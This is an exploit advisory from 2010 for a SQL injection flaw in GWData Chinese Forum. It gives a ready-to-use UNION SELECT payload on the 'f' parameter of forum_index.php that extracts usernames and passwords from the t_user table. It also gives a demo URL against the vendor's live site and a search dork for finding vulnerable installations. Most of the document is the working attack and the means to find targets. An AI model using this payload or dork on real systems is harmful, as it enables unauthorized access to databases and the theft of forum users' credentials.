GWData Chinese Forum SQL Injection Vulnerability
Posted on 16 March 2010
================================================ GWData Chinese Forum SQL Injection Vulnerability ================================================ [~]######################################### InformatioN #############################################[~] [~] Title : GWData Chinese Forum SQL Injection [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com [~]######################################### ExploiT #############################################[~] [~] Vulnerable File : http://127.0.0.1/forum_index.php?f=[SQL] [~] ExploiT : -1 UNION SELECT 1,2,3,4,5,6,7,8,9,0 FROM t_user [~] Example : http://127.0.0.1/forum_index.php?f=-1 UNION SELECT 1,2,3,concat(u_logname,0x3a,u_pass),5,6,7,8,9,0 FROM t_user [~] Demo : http://www.gwdata.cn/forum/forum_index.php?f=-1 UNION SELECT 1,2,3,concat(u_logname,0x3a,u_pass),5,6,7,8,9,0 FROM t_user [~] Dork : "Powered by GwData.cn Version 1.0.0" # ~ - [ [ : Inj3ct0r : ] ]